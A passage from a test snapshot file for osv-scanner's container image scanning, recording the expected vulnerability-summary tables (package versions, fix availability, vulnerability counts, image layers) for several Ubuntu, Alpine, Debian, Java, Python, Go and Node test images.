shadow | 1:4.8.1-2ubuntu2.2 | No fix available | 2 | login, passwd | # 4 Layer | ubuntu | | systemd | 249.11-0ubuntu3.12 | Partial fixes Available | 3 | libsystemd0... (2) | # 4 Layer | ubuntu | | tar | 1.34+dfsg-1ubuntu0.1.22.04.2 | No fix available | 1 | tar | # 4 Layer | ubuntu | | util-linux | 2.37.2-4ubuntu3.4 | Fix Available | 1 | libblkid1... (6) | # 4 Layer | ubuntu | | zlib | 1:1.2.11.dfsg-2ubuntu9.2 | No fix available | 1 | zlib1g | # 4 Layer | ubuntu | +----------------+------------------------------+-------------------------+------------+-------------------------+------------------+---------------+ Hiding 5 number of vulnerabilities deemed unimportant, use --all-vulns to show them. For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json - 2] --- [TestCommand_OCIImage/Scanning_java_image_with_some_packages - 1] Scanning local image tarball "./testdata/test-java-full.tar" Container Scanning Result (Alpine Linux v3.21) (Based on "eclipse-temurin" image): Total 25 packages affected by 73 known vulnerabilities (4 Critical, 29 High, 35 Medium, 4 Low, 1 Unknown) from 2 ecosystems. 73 vulnerabilities can be fixed. Maven +-------------------------------------------------------------------------------------------------------------------------------+ | Source:artifact:/app/target.jar | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ | com.fasterxml.jackson.core:jackson-core | 2.10.2 | Fix Available | 3 | # 12 Layer | -- | | com.google.protobuf:protobuf-java | 3.21.12 | Fix Available | 1 | # 12 Layer | -- | | com.nimbusds:nimbus-jose-jwt | 9.31 | Fix Available | 2 | # 12 Layer | -- | | commons-beanutils:commons-beanutils | 1.9.4 | Fix Available | 1 | # 12 Layer | -- | | dnsjava:dnsjava | 3.4.0 | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec-http | 4.1.100.Final | Fix Available | 3 | # 12 Layer | -- | | io.netty:netty-codec-http2 | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-codec-smtp | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | io.netty:netty-common | 4.1.100.Final | Fix Available | 2 | # 12 Layer | -- | | io.netty:netty-handler | 4.1.100.Final | Fix Available | 1 | # 12 Layer | -- | | org.apache.avro:avro | 1.9.2 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-compress | 1.21 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-configuration2 | 2.8.0 | Fix Available | 2 | # 12 Layer | -- | | org.apache.commons:commons-lang3 | 3.12.0 | Fix Available | 1 | # 12 Layer | -- | | org.eclipse.jetty:jetty-http | 9.4.53.v20231009 | Fix Available | 2 | # 12 Layer | -- | +-------------------------------------------+-------------------+---------------+------------+------------------+---------------+ Alpine:v3.21 +-----------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ | busybox | 1.37.0-r9 | Fix Available | 2 | busybox... (3) | # 0 Layer | alpine | | expat | 2.6.4-r0 | Fix Available | 6 | libexpat | # 5 Layer | eclipse-temurin | | gnupg | 2.4.7-r0 | Fix Available | 2 | gnupg... (11) | # 5 Layer | eclipse-temurin | | gnutls | 3.8.8-r0 | Fix Available | 7 | gnutls | # 5 Layer | eclipse-temurin | | libpng | 1.6.44-r0 | Fix Available | 8 | libpng | # 5 Layer | eclipse-temurin | | libtasn1 | 4.19.0-r2 | Fix Available | 2 | libtasn1 | # 5 Layer | eclipse-temurin | | musl | 1.2.5-r8 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.3.2-r4 | Fix Available | 15 | libcrypto3, libssl3... (3) | # 0 Layer | alpine | | sqlite | 3.47.1-r0 | Fix Available | 4 | sqlite-libs | # 5 Layer | eclipse-temurin | +----------------+-------------------+---------------+------------+----------------------------+------------------+-----------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_java_image_with_some_packages - 2] --- [TestCommand_OCIImage/Scanning_python_image_with_no_packages - 1] Scanning local image tarball "./testdata/test-python-empty.tar" Container Scanning Result (Debian GNU/Linux 10 (buster)) (Based on "python" image): Total 15 packages affected by 27 known vulnerabilities (0 Critical, 7 High, 4 Medium, 2 Low, 14 Unknown) from 2 ecosystems. 27 vulnerabilities can be fixed. PyPI +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 7 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 7 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 13 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | wheel | 0.40.0 | Fix Available | 1 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ Debian:10 +-----------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | debian-archive-keyring | 2019.1+deb10u1 | Fix Available | 1 | debian-archive-keyri... (1) | # 0 Layer | debian | | expat | 2.2.6-2+deb10u6 | Fix Available | 1 | libexpat1 | # 7 Layer | python | | glibc | 2.28-10+deb10u2 | Fix Available | 2 | libc-bin, libc6 | # 0 Layer | debian | | gnutls28 | 3.6.7-4+deb10u10 | Fix Available | 2 | libgnutls30 | # 0 Layer | debian | | ncurses | 6.1+20181013-2+deb10u3 | Fix Available | 2 | libncursesw6... (4) | # 0 Layer | debian | | openssl | 1.1.1n-0+deb10u5 | Fix Available | 1 | libssl1.1, openssl | # 4 Layer | python | | systemd | 241-7~deb10u9 | Fix Available | 1 | libsystemd0... (2) | # 0 Layer | debian | | tar | 1.30+dfsg-6 | Fix Available | 1 | tar | # 0 Layer | debian | | tzdata | 2021a-0+deb10u11 | Fix Available | 2 | tzdata | # 0 Layer | debian | | util-linux | 2.33.1-0.1 | Fix Available | 1 | fdisk, libblkid1... (8) | # 0 Layer | debian | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_python_image_with_no_packages - 2] --- [TestCommand_OCIImage/Scanning_python_image_with_some_packages - 1] Scanning local image tarball "./testdata/test-python-full.tar" Container Scanning Result (Debian GNU/Linux 10 (buster)) (Based on "python" image): Total 21 packages affected by 53 known vulnerabilities (1 Critical, 18 High, 16 Medium, 3 Low, 15 Unknown) from 2 ecosystems. 53 vulnerabilities can be fixed. PyPI +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/pip-23.0.1-py3-none-any.whl | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 7 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/ensurepip/_bundled/setuptools-58.1.0-py3-none-any.whl | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 7 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/Django-1.11.29.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | django | 1.11.29 | Fix Available | 7 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/Flask-0.12.2.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | flask | 0.12.2 | Fix Available | 4 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/idna-2.7.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | idna | 2.7 | Fix Available | 1 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/pip-23.0.1.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | pip | 23.0.1 | Fix Available | 3 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ +----------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/requests-2.20.0.dist-info/METADATA | +----------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+---------------+------------+------------------+---------------+ | requests | 2.20.0 | Fix Available | 3 | # 17 Layer | -- | +----------+-------------------+---------------+------------+------------------+---------------+ +------------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/setuptools-58.1.0.dist-info/METADATA | +------------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +------------+-------------------+---------------+------------+------------------+---------------+ | setuptools | 58.1.0 | Fix Available | 3 | # 13 Layer | python | +------------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/urllib3-1.24.3.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | urllib3 | 1.24.3 | Fix Available | 9 | # 17 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +----------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/werkzeug-3.1.4.dist-info/METADATA | +----------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+---------------+------------+------------------+---------------+ | werkzeug | 3.1.4 | Fix Available | 2 | # 17 Layer | -- | +----------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/usr/local/lib/python3.9/site-packages/wheel-0.40.0.dist-info/METADATA | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | wheel | 0.40.0 | Fix Available | 1 | # 13 Layer | python | +---------+-------------------+---------------+------------+------------------+---------------+ Debian:10 +-----------------------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/var/lib/dpkg/status | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ | debian-archive-keyring | 2019.1+deb10u1 | Fix Available | 1 | debian-archive-keyri... (1) | # 0 Layer | debian | | expat | 2.2.6-2+deb10u6 | Fix Available | 1 | libexpat1 | # 7 Layer | python | | glibc | 2.28-10+deb10u2 | Fix Available | 2 | libc-bin, libc6 | # 0 Layer | debian | | gnutls28 | 3.6.7-4+deb10u10 | Fix Available | 2 | libgnutls30 | # 0 Layer | debian | | ncurses | 6.1+20181013-2+deb10u3 | Fix Available | 2 | libncursesw6... (4) | # 0 Layer | debian | | openssl | 1.1.1n-0+deb10u5 | Fix Available | 1 | libssl1.1, openssl | # 4 Layer | python | | systemd | 241-7~deb10u9 | Fix Available | 1 | libsystemd0... (2) | # 0 Layer | debian | | tar | 1.30+dfsg-6 | Fix Available | 1 | tar | # 0 Layer | debian | | tzdata | 2021a-0+deb10u11 | Fix Available | 2 | tzdata | # 0 Layer | debian | | util-linux | 2.33.1-0.1 | Fix Available | 1 | fdisk, libblkid1... (8) | # 0 Layer | debian | +------------------------+------------------------+---------------+------------+-----------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/Scanning_python_image_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_image_with_go_binary - 1] Scanning local image tarball "./testdata/test-package-tracing.tar" Container Scanning Result (Alpine Linux v3.20) (Based on "alpine" image): Total 9 packages affected by 213 known vulnerabilities (2 Critical, 6 High, 11 Medium, 2 Low, 192 Unknown) from 2 ecosystems. 213 vulnerabilities can be fixed. Go +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/more-vuln-overwrite-less-vuln | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 9 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.2.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 2 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.3.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 4 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.3.0-moved | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 3 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-1.4.0 | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 2 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ +---------------------------------------------------------------------------------------------+ | Source:artifact:/go/bin/ptf-vulnerable | +---------+-------------------+---------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+---------------+------------+------------------+---------------+ | stdlib | 1.22.4 | Fix Available | 32 | # 7 Layer | -- | +---------+-------------------+---------------+------------+------------------+---------------+ Alpine:v3.20 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r29 | Fix Available | 2 | busybox... (3) | # 0 Layer | alpine | | musl | 1.2.5-r0 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.3.1-r0 | Fix Available | 18 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_image_with_go_binary - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled - 2] --- [TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors - 1] Scanning local image tarball "./testdata/test-alpine-etcshadow.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-npm-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-npm-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 4 packages affected by 18 known vulnerabilities (3 Critical, 3 High, 10 Medium, 2 Low, 0 Unknown) from 2 ecosystems. 17 vulnerabilities can be fixed. npm +-------------------------------------------------------------------------------------------------+ | Source:artifact:/prod/app/node_modules/.package-lock.json | +----------+-------------------+------------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +----------+-------------------+------------------+------------+------------------+---------------+ | cryo | 0.0.6 | No fix available | 1 | # 14 Layer | -- | | minimist | 0.0.8 | Fix Available | 2 | # 13 Layer | -- | +----------+-------------------+------------------+------------+------------------+---------------+ Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_npm_with_some_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages - 1] Scanning local image tarball "./testdata/test-node_modules-pnpm-empty.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer | alpine | | openssl | 3.1.4-r5 | Fix Available | 9 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_no_packages - 2] --- [TestCommand_OCIImage/scanning_node_modules_using_pnpm_with_some_packages - 1] Scanning local image tarball "./testdata/test-node_modules-pnpm-full.tar" Container Scanning Result (Alpine Linux v3.19) (Based on "library/node" image): Total 2 packages affected by 15 known vulnerabilities (1 Critical, 3 High, 9 Medium, 2 Low, 0 Unknown) from 1 ecosystem. 15 vulnerabilities can be fixed. Alpine:v3.19 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | busybox | 1.36.1-r15 | Fix Available | 6 | busybox... (3) | # 0 Layer 